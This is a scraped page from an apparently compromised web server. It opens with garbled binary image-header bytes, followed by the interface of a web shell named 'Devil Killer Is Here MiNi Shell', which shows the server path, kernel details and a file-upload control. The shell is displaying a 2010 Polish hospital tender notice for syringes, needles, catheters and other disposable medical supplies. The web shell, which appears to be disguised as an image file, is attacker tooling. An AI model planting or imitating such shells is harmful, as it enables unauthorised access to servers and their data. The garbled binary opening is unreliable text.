JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101115/369004-N-2010.html

<p class="kh_header"><b>Łódź: Dostawa sprzętu jednorazowego użytku (strzykawki, igły, kaniule i inne). Sprawa nr 66/2010</b><br>
<b>Numer ogłoszenia: 369004 - 2010; data zamieszczenia: 15.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> III Szpital Miejski im. dr Karola Jonschera , ul. Milionowa 14, 93-113 Łódź, woj. łódzkie, tel. 42 6761790, faks 42 6761785.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.jonscher.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu jednorazowego użytku (strzykawki, igły, kaniule i inne). Sprawa nr 66/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa sprzętu jednorazowego użytku (strzykawki, igły, kaniule i inne).Zamawiający dopuszcza złożenia oferty częściowej (w podziale na pięć zakresów z możliwością składania ofert na poszczególne pozycje w zakresach I, IV i V). Szczegółowy opis przedmiotu zamówienia został zawarty w zał. nr 2 do SIWZ. Zamówienie poniżej 193.000 euro..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się udzielenie zamówień uzupełniających - zgodnie z art. 67 ust.1 pkt 7, ustawy Prawo zamówień publicznych. Jeżeli nastąpi konieczność skorzystania z zamówienia uzupełniającego będzie ono udzielone do wysokości 20 % wartości zamówienia podstawowego na podstawie odrębnej umowy</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w maksymalnej wysokości: 12.000,00 PLN. Szczegółowe informacje dotyczące podziału wadium zawiera SIWZ. Wadium wniesione w pieniądzu musi znajdować się na koncie Zamawiającego najpóźniej do upływu terminu składania ofert</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) Oświadczenie Wykonawcy, że dysponuje kompletem pozwoleń / zgłoszeń / świadectw rejestracji wydanych przez uprawnione organy (np. Urząd Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych, Minister Zdrowia) w zakresie przedmiotu zamówienia oraz, że na każde żądanie zamawiającego przedstawi poświadczone za zgodność z oryginałem kserokopie pozwoleń / świadectw / zgłoszeń) oraz że przedmiot zamówienia spełnia wymagania polskich i europejskich norm oraz oznaczony jest znakiem CE; 2) Informacje (w języku polskim, a dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę) na temat oferowanego przedmiotu zamówienia (np. strony katalogowe, ulotki informacyjne), potwierdzające spełnienie wymagań określonych w załączniku nr 2. Każdą ze stron katalogowych należy opisać, którego zakresu i pozycji dotyczy</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy, że nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub oświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)Zmiany niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności i będą dopuszczalne w sytuacji wycofania asortymentu z produkcji, zmiany wielkości opakowań, nieuzyskania wymaganych prawem dokumentów dopuszczających do obrotu na rynku, zmiany obowiązujących przepisów prawa. 
2) W przypadku zaistnienia którejkolwiek z okoliczności, określonych w pkt 1, Wykonawca zobowiązany będzie przedłożyć wraz z prośbą o zmianę umowy, dokumenty potwierdzające zasadność takiej zmiany. W przypadku zmiany wielkości opakowań, dopuszczalne będzie odpowiednie przeliczenie ilości, za zgodą Zamawiającego.
3) W przypadku szczególnych okoliczności, takich jak wstrzymanie lub zakończenie produkcji, strony dopuszczają możliwość dostarczania odpowiedników preparatów objętych umową, w cenach nie przewyższających cen zawartych w ofercie przetargowej.
4) Cena jednostkowa może ulec zmianie w sytuacjach, gdy obowiązek zmiany cen wynika z przepisów prawa</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.jonscher.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> III Szpital Miejski im. dr. Karola Jonschera, ul. Milionowa 14 w Łodzi..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2010 godzina 09:00, miejsce: III Szpital Miejski im. dr. Karola Jonschera, ul. Milionowa 14 w Łodzi w pok. 110 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakres I - Strzykawki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza składanie ofert na poszczególne pozycje w tym zakresie. Poz. 1 - Strzykawka 2ml, jałowa, tłok z polietylenu, cylinder z polipropylenu, czytelna i trwała skala
poz. 2 -  Strzykawka 5ml, jałowa, tłok z polietylenu, cylinder z polipropylenu, czytelna i trwała skala
poz. 3 - Strzykawka 10ml, jałowa, tłok z polietylenu, cylinder z polipropylenu, czytelna i trwała skala
poz. 4 - Strzykawka 20ml, jałowa, tłok z polietylenu, cylinder z polipropylenu, czytelna i trwała skala 
poz. 5 - Strzykawka niskooporowa 10ml do znieczuleń zewnątrzoponowych
poz. 6 - Strzykawka 20ml, jałowa, do pomp perfuzyjnych z końcówką luer-lock, trzyczęściowa, czytelna i trwała skala, wyraźne oznacznie logo producenta oraz typu strzykawki na cylindrze
poz. 7 - Strzykawka 50ml, jałowa, (bez rozszerzonej skali) do pomp perfuzyjnych z końcówką luer-lock, z prostopadłym wycięciem na tłoku i kołnierzykiem na końcówkce, czytelna i trwała skala, wyraźne oznacznie logo producenta oraz typu strzykawki na cylindrze
poz. 8 - Strzykawka bursztynowa 50ml, jałowa,  do pomp perfuzyjnych z końcówką luer-lock, z prostopadłym wycięciem na tłok i kołnierzykiem na końcówkcę z tłokiem wystającym poza cylinder min. 3,5cm, czytelna i trwała skala, wyraźne oznacznie logo producenta oraz typu strzykawki na cylindrze
poz. 9 - Strzykawka trzyczęściowa luer-lock, z uszczelnieniem bezlateksowym, 2-3ml, jałowa, czytelna i trwała skala
poz. 10 - Trzyczęściowa strzykawka jednorazowego użytku o poj. 50(60)ml z zakończeniem pasującym do różnego rodzaju cewników, jałowa, niepirogenna, nietoksyczna, tłok szczelnie przylegający do korpusu, czytelna i trwała skala
poz. 11 - Strzykawka 100ml, jałowa, stożek z tłokiem i uszczelnieniem bezlateksowym, czytelna i trwała skala
poz. 12 - Strzykawka 100ml (typu Janette), jednorazowego użytku, jałowa, z łącznikiem Luer
poz. 13 - Strzykawaka do płukania pęcherza moczowego 140ml
poz. 14 - Strzykawka insulinowa 1ml/40j., w zestawie z nakładaną igłą 27G 1ml, jałowa, czytelna i trwała skala.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakres II - Igły iniekcyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający nie dopuszcza złożenia oferty częściowej w tym zakresie. Szczegółowy opis przedmiotu zamówienia został zawarty w zał. nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zakres III - Kaniule.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający nie dopuszcza złożenia oferty częściowej w tym zakresie. Szczegółowy opis przedmiotu zamówienia został zawarty w zał. nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zakres IV - Różny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający dopuszcza składanie ofert na poszczególne pozycje w tym zakresie. Poz. 1 - Igla do nakłuć lędźwiowych (rozm. 1,2-1,25x90), opakowanie wykonane z utwardzonej folii profilowanej (tłoczonej) przezroczystej, zabezpieczonej usztywnionym tworzywem sztucznym (typu TYVECK)
poz. 2 - Igła kulkowa do płukania ran, wielokrotnego użytku, zakrzywiona 1,2x80mm, do strzykawki typu luer, do sterylizacji w temp. 121-134 st. C
poz. 3 - Cewnik Nelaton (rozm Ch 6-24), sterylny, dwa otwory boczne, atraumatyczny, zamknięty koniec, opakowanie folia-papier
poz. 4 - Cewnik Foley, z powłoką antybakteryjną, z azotanem srebra, silikonowy (nr 16-20)
poz. 5 - Butelka Redona do odsysania długotrwałego, poj. 400-500 ml, jałowa, łatwość wytwarzania próżni, widoczna skala, końcówka dostosowana do drenów o różnej średnicy, opakowanie umożliwiające otworzenie w sposób zapewniający zachowanie sterylności produktu (kompatybilna z drenami Redona)
poz. 6 - Zestaw do płukania otrzewnej. Kaniula punkcyjna (16-14G) typu Insyte o dł. Min. 45mm, zestaw drenów z kranikiem trójdrożnym, strzykawka min. 50ml, worek zbiorczy o poj. min 8000ml, opakowanie wewn. - folia, zewn. - folia/papier
poz. 7 - Zestaw do systemu Medrad Stellant CT (w zestawie: wkład jednorazowy o poj. 200ml (2szt.), złącze szybkiego napełniania oraz złącze niskiego ciśnienia z trójnikiem i pojemniczkiem do odpowietrzania) (20kpl. w op.)
poz. 8 - Złącze niskiego ciśnienia z trójnikiem i pojemniczkiem do odpowietrzania, kompatybilne z zestawem Medrad Stellant CT
poz. 9 - Przyrząd do przetaczania płynów infuzyjnych z rolkowym regulatorem przepływu w opak.zapewniającym sterylność
poz. 10 - Przyrząd uniwersalny do żywienia w wersji grawitacyjnej do butelek
poz. 11 - Zestaw do nakłucia worka osierdziowego
poz. 12 - 	Aparat do ćwiczenia górnych dróg oddechowych z min. 3 komorami zakresu oddechowego
poz. 13  - Anoscope dł.8,5cm (op a100szt)
poz. 14 - Ustnik papierowy jednorazowy, do spirometru Spirolab, średnica zewn. 30mm
poz. 15 - Ustnik plastikowy jednorazowy, do spirometru Lungtest 2000
poz. 16 - Rura karbowana silikonowa wielorazowego użytku, średnica 22mm, dł. 110-130cm 
poz. 17 - Czujnik BIS dla dorosłych, kompatybilny z monitorem BIS VISTA głębokiego uśpienia 5010 (op. 10szt.)
poz. 18 - Silikonowe odciągi do podtrzymywania narządów wypreparowanych w czasie operacji, szer. 2cm, dł. ca 900mm
poz. 19 - Zestawy do przezskórnej nefrostomii (jałowy pojedynczo pakowany) skład: zestaw do nefrostomii, komplet rozszerzadeł (rozm. 10, 13, 15), kateter PIGTAIL 45cm, prowadnica druciana wykonana ze stali nierdzewnej chromowo-niklowej, elastyczna końcówka, sztywny odcinek 300mm miękki odcinek ostatni, rozszerzacz z koszulką rozrywalną, strzykawka LUER, skalpel, kołnierz mocujący, opaska uciskowa, cewnik z poliuretanu kontrastujący w RTG, trzyczęściowa igła punkcyjna z regulowaną głębokością wkłucia
poz. 20 - Zestaw do drenażu osierdzia składający się z cewnika angiograficznego PIGTAIL (dł. 100-120cm, o5mm), znakowany markerami w dystalnym odcinku cewnika na odcinku przynajmniej 20cm. Markery zlokalizowane co 1cm na znakowanym odcinku, wyposażony w prowadnicę, igłę prostą i strzykawkę
poz. 21 - Rurka intubacyjna ustna wstępnie uformowana RAE z balonem rozm 6-9
poz. 22 - Rurka combitube - dwuświatłowa rurka dotchawicza, jednorazowego użytku, zestaw z dwoma strzykawkami oraz z cewnikiem do odsysania, rozmiar dla pacjenta o wzroście 120-180 cm.
poz. 23 - Filtry antywirusowe i antybakteryjne, średnica 35mm, do ssacza AGA labor
poz. 24 - Filtry antybakteryjne do ssaka próżniowego RV TM-600
poz. 25 - Filtr bakteryjny do monitorowania gazów anestetycznych w strumieniu bocznym (kompatybilny z kardiomonitorem Diascope Anesthetic Artema)
poz. 26 - Linia próbkująca do monitorowania gazów anestetycznych w strumieniu bocznym (kompatybilna z kardiomonitorem Diascope Anesthetic Artema)
poz. 27 - Maska krtaniowa jednorazowego użytku, silikonowa, zapewniająca bezpieczne i bezurazowe założenie, kołnierz maski idealnie dopasowujący się do budowy anatomicznej pacjenta, przezroczysta rurka umożliwiająca obserwację jej wnętrza (rozm 4, 5)
poz. 28 - Trójnik do rur do aparatu do znieczulenia z  możliwością odsysania dróg oddechowych pacjenta bez rozłączenia układu oddechowego
poz. 29 - Sonda Millera Abotta (rozmiar nr 14-18) jednorazowego użytku, pakowana pojedynczo, opakowanie wewn. - folia, zewn.-  folia-papier
poz. 30 - Sonda żołądkowa nr 24-1000, jałowa
poz. 31 - Sonda żołądkowa z korkiem (nr 1 do 5) sylikonowana do zabiegów naczyniowych, dł. ok. 50cm
poz. 32 - Sonda żołądkowa jednorazowego użytku, z oliwką z otworami bocznymi, okrągłe zakończenie główne, rozm. ch 16-22
poz. 33 - a) Basen plastikowy, poj. 2l, kompatybilny z basenem papierowym do maceratora 
	b) Basen papierowy (z pulpy), poj. 2l (dł. 383mm, szer. 300mm, wys. 95mm) do maceratora 
	c) Pokrywki do basenów z pulpy do maceratora
poz. 34 - a) Płytka z otworem na stomię (kształt okrągły lub kwadratowy) o wym. 10x10cm, kompatybilna z workiem stomijnym o średnicy pierścienia 80mm 
	b) Worek stomijny otwarty, kolor cielisty, bez filtra węglowego, pokryty po stronie spodniej miękką flizeliną, a od wierzchniej specjalną folią nieprzepuszczającą zapachów, średnica pierścienia otworu 80mm, poj. 750ml, kompatybilny z płytką
poz. 35 - Rękawice chirurgiczne lateksowe lekko pudrowane mąką kukurydzinaną (rozm. 6,0-9,0),sterylne, sterylizowane promieniami Gamma, z wydłużonym mankietem o małej zawartości protein (posiadającym podłużne i poprzeczne wzmocnienia zapobiegające zsuwaniu się), wskaźnik AQL mniejsze bądź równe 1,0, opakowanie nieprzepuszczalne dla ozonu foliowe lub wewn. obustronnie foliowane
poz. 36 - Rękawice chirurgiczne lateksowe bezpudrowe (rozm. 6,0-9,0), sterylne, sterylizowane promieniami Gamma, z prostym mankietem z taśmą adhezyjną, pow. zewnętrzna mikroteksturowana i silikonowana, pow. wewnętrzna pokryta poliuretanem, polimerem i silikonem
poz. 37 - Rękawice nitrylowe bezpudrowe, do pracy ze środkami biologicznymi wysokiego ryzyka, grubość 0,4-0,7; rozmiar S, M; AQL mniejsze bądź równe 1,5 (op/100szt.)
poz. 38 - Rękawice diagnostyczne nitrylowe bezpudrowe (rozm. S, M, L). Wskaźnik AQL-1,5 (widoczny na opakowaniu jednostkowym), kształt uniwersalny (pasujący na prawą i lewą dłoń), dające się łatwo zakładać i zdejmować. Odpowiednie oznakowanie znakiem CE i nazwą producenta. Zgodność z normą EN-455 potwierdzona przez jedn.notyfikowaną (op/100szt.)
poz. 39 - Elektroda powierzchniowa, jednorazowa żelowana do kabli z klamerkami, kompatybilna z aparatem EMG firmy MEDTRONIC typ: Keypoint Clinical System (op a100szt.)
poz. 40 - Elektroda igłowa, jednorazowa, koncentryczna 37x0,46mm, kompatybilna z aparatem EMG firmy MEDTRONIC typ: Keypoint Clinical System (op a25 szt.)
poz. 41 - Elektroda igłowa do iniekcji toksyny botulinowej, kompatybilna z aparatem EMG firmy MEDTRONIC typ: Keypoint Clinical System
poz. 42 - Papier termoczuły do spirometru MIR, szer. 112mm 
poz. 43 - Pasta every do badań holtera, do oczyszczania i odtłuszczania skóry (ścierna)
poz. 44 - Pasta do badań całodobowych EEG-HOLTER ec2 (do aparatu firmy MEDTRONIC typ: Keypoint Clinical System)
poz. 45 - Termometr bezdotykowy, bezkontaktowa metoda pomiaru, odległość pomiaru 5-8cm od badanego obiektu. Tryb pomiaru temp. ciała ludzkiego w zakresie 30-45 st.C. Błyskawiczny, precyzyjny pomiar, czytelny wyświetlacz. Skala pomiaru co 0,1 st.C. Pamięć min. 8 ostatnich pomiarów. Wskaźnik rozładowania baterii
poz. 46 - Utrwalacz do badań histopatologicznych na szkiełko (250ml)
poz. 47 - Maski chirurgiczne trzywarstwowe maski z gumkami zakładanymi za uszy, z usztywnioną częścią na nos, z fitrem bakteryjnym, zgodna z normą EN 14683 typ 2
poz. 48 - Jednorazowe ochraniacze na obuwie z włókniny PP 38g/m2, z warstwą antypoślizgową nieprzesiąkalną z polietylenu PE
poz. 49 - Podkład jednorazowego użytku, 150 x 90-100cm z miękkiej, przyjaznej dla skóry włókniny foliowanej (zabezpieczonej od spodu nieprzepuszczalną folią, wykonaną z materiału antypoślizgowego) wiskozowo-polietylenowej o gramaturze 59g/m2
